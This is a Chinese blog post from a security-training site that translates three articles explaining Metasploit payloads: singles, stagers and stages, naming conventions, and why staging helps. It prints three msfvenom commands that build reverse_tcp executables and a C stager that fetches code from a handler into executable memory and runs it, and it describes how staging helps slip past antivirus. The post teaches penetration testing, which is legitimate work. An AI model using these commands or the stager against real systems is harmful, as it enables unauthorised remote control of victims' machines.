网络安全实验室

深入理解metasploit的payload

2019-04-04  本文已影响0人  蚁景科技

Metasploit- Payload

简单来说,Payload是黑客用来与被黑了的系统交互的简单脚本。使用payload,可以将数据传输到已经沦陷的系统。

Metasploit有效载荷可以有三种类型-

Singles- Singles非常小,旨在建立某种通讯,然后进入下一阶段。例如,只是创建一个用户。

Staged- 是一种攻击者用来将更大的文件上传到沦陷的系统的payload。

Stages- Stages是由Stagers模块下载的payload组件。各种payload stages提供高级功能,没有规模限制,如Meterpreter和VNCInjection。

例子:让我们举个例子来理解Metasploitpayload的使用。假设我们有一台易受DCOM MS03-026攻击的WindowsServer 2003计算机。首先,我们将搜索可以使用此漏洞的exp。我们将使用具有最佳RANK的漏洞利用。

然后我们使用下列命令来看看我们可以使用的payload

看到列出的payload可以能帮助我们上传/执行文件,使沦陷的系统成为vnc服务器(能远程监视)

上图的命令将会显示可以帮助我们在受害者机器上上传/执行文件的payload

为了设置我们需要的payload,可以使用下列命令

设置好监听主机和监听端口,受害者的主机和端口

输入“exploit”就会创建下图所示的会话

现在我们可以根据此payload提供的设置来操纵受害者的机器了。

原文:https://www.tutorialspoint.com/metasploit/metasploit_payload.htm

HowPayloads Work

payload模块位于modules/payloads/{singles,stages,stagers}/<platform>>。

当框架启动时,stages与stagers结合以创建可在漏洞利用中使用的完整的payload。然后,handlers与payload配对,因此框架将知道如何使用给定的通信机制创建会话。

Payload被赋予参考名称,如下所示:

Staged payloads:<platform>/ [arch] / <stage> / <stager>

Single payloads:<platform>/ [arch] / <single>

这会产生像windows/ x64 / meterpreter / reverse_tcp这样的payload。平台是windows,架构是x64,我们提供的最终的stage是meterpreter,而传递它的stager是reverse_tcp。

请注意,arch是可选的,因为在某些情况下,它是不必要或者已经默认了。比如php/ meterpreter / reverse_tcp。PHP的payload不需要Arch,因为我们提供的是解释代码而不是二进制代码。

Singles

Singlepayload发射后就不管了(就像发射x级火箭一样)。它们可以与Metasploit建立沟通机制,但没有必要。你可能会需要singlepayload的场景就是目标没有接入网络,此时仍然可以通过USB密钥提供文件格式攻击。

Stagers

Stagers是一个小发射器(同样以火箭发射作比喻),旨在创建某种形式的通信,然后将执行传递到下一个阶段。使用stager解决了两个问题。首先,它允许我们最初使用较小的有效负载来加载具有更多功能的较大的payload。其次,它使通信机制与最终阶段分离成为可能,因此一个payload无需复制代码就可以与多个传输一起使用。

Stages

由于stager通过为我们分配大量内存来介意任何大小限制问题,因此stages可以任意大。它的优点之一是能够以更高级别的语言(如C语言)编写最终阶段的payload。

DeliveringStages

你希望payload连接回来的IP地址和端口被嵌入到stager中。如上所述,所有staged payload仅仅是建立通信并执行下一阶段的小推进器。当使用staged payload创建可执行文件时,实际上只是创建了stager。所以以下命令将创建功能相同的exe文件:

msfvenom-f exe LHOST=192.168.1.1 -p windows/meterpreter/reverse_tcp

msfvenom-f exe LHOST=192.168.1.1 -p windows/shell/reverse_tcp

msfvenom-f exe LHOST=192.168.1.1 -p windows/vncinject/reverse_tcp

(请注意,它们在功能上是相同的- 但是由于其中有很多随机化,因此没有两个可执行文件是完全相同的)

无论使用stager设置的哪种传输机制(例如:tcp,http,https),Ruby端都是充当客户端。

对于shell阶段,Metasploit会在你与其进行交互时将远程进程的标准输入输出连接到你的终端。

在Meterpreter阶段的情况下,Metasploit将开始使用Meterpreterwire协议。

原文:https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work

StagedPayloads – What Pen Testers Should Know

Metasploit框架将攻击与成功利用后执行的内容(payload)分离开来。Metasploit框架中的payload也分为两部分,即stager和stage。stager负责下载大型payload(stage),将其注入内存,并将执行动作传递给它。

Staging是必要的。许多可利用的情况限制了攻击者可以将多少未加载的字节加载到内存中的一个连续位置。在这些情况下进行后渗透的一种方法是分阶段传递payload。

Stagers通常用优化过的汇编语言编写。攻击者的目标是使stager尽可能小。一个小的stager可以让攻击者在更多的渗透环境下更自由地使用它。

此代码段显示用C编写的stager。分配缓冲区,下载阶stage,并将控制权传给它。

/*connect to the handler */

SOCKETmy_socket = wsconnect(argv[1], atoi(argv[2]));

/*read the 4-byte length */

intcount = recv(my_socket, (char *)&size, 4, 0);

if(count != 4 || size <= 0)     punt(my_socket, "read a strangeor incomplete length value\n"); /* allocate a RWX buffer */buffer = VirtualAlloc(0, size + 5, MEM_COMMIT,PAGE_EXECUTE_READWRITE); if (buffer == NULL)     punt(my_socket,"could not allocate buffer\n"); /* prepend a littleassembly to move our SOCKET value to the EDI register    thanks mihifor pointing this out    BF 78 56 34 12     =>      mov edi,0x12345678 */

buffer[0]= 0xBF;

/*copy the value of our socket to the buffer */

memcpy(buffer+ 1, &my_socket, 4);

/*read bytes into the buffer */

count= recv_all(my_socket, buffer + 5, size);

/*cast our buffer as a function and call it */

function= (void (*)())buffer;

function();

Staging实现了只需几个stager就可以提供各种payload的目的。只要我有与stager兼容的代码,我就可以向stager支持的所有漏洞提供我的代码(同样,代码规模是一个制约)。这种灵活性使得像Beacon这样的有效载荷成为可能,而无需修改Metasploit框架。

使用stager也可以使逃避反病毒引擎变得更加简单。Windows Meterpreter为700KB,CobaltStrike的Beacon为120KB。让我们假设没有大小限制 -如果我创建一个攻击包,按原样传递我想要的payload,我正在为反病毒软件供应商提供大量需要编写签名的文件。通过使用stager来传递payload,我只需关注获取stager和攻击包来绕过反病毒软件就可以了。如果stager没有被安全厂商发现,那么我的stage可能是安全的。

理论上,stage可以是任何大小的任意位置的代码。实际上,与Metasploit框架一起使用的stage是用C编写的DLL。这些DLL和由StephenFewer编写的反射DLL注入库进行编译。该库能够将库从内存加载到进程中。

在准备 stage 时,Metasploit框架会将引导代码添加到payloadDLL的开头。此引导代码在payloadDLL内存所在位置调用payloadDLL中的反射DLL注入函数。一旦stager将控制传递给它,这个引导代码与反射DLL注入库相结合,允许有效负载在没有接触磁盘的情况下将自身加载到进程中。根据我的经验,此过程需要特定的编译器和设置合适的环境变量才能正常工作。

如果你在wireshark中查看staging的过程,将会看到未经过混淆的DLL通过网络传输。此时容易被安全厂商发现;幸运的是,MetasploitFramework现在可以选择对第二个stage进行编码。这些选项是EnableStageEncoding和StageEncoder。Cobalt Strike的ListenerManager功能会自动设置这些选项。

遗憾的是,在MetasploitFramework工具集下,stager的大小限制使得其他通信选项更具挑战性。如果没有内置的Windows库来下载代码非常少的stage,那么为该协议编写一个stager就没什么意义了。如果没有stager至此某种协议,那么让Meterpreter或其他payload使用该协议是没有意义的。逻辑是这样的 - 如果我可以stageover一种协议,那么我必须能够通过它进行通信。如果我不能stageover一种协议,我不应该指望我可以首先stage某个payload。

Staged payload是渗透测试人员的利器。在成功渗透之后,Stagers为我们提供了很多灵活性。虽然这个过程对用户来说基本上是不可见的,但我写这篇文章是为了解释正在发生的事情。我们越熟悉我们的工具,我们就有能力使用好它们。

原文:https://blog.cobaltstrike.com/2013/06/28/staged-payloads-what-pen-testers-should-know/

三篇文章,由浅入深,先介绍了msfpayload的概念及使用,进而介绍了其工作原理,最后着重介绍了stagedpayload。三篇文章是不同的大佬所写,今日再查阅相关资料时偶然联系起来,所以翻译后集合在一起发表,译者水平有限,大佬们萌新们看着开心就好了。

相关实验

metasploit实践指南:

http://www.hetianlab.com/cour.do?w=1&c=C172.19.104.182014120510572900001

metasploit之另类应用:

http://www.hetianlab.com/cour.do?w=1&c=CCID5e07-87bb-4dc7-8bec-cf2fdfac89b4

上一篇 下一篇

猜你喜欢

热点阅读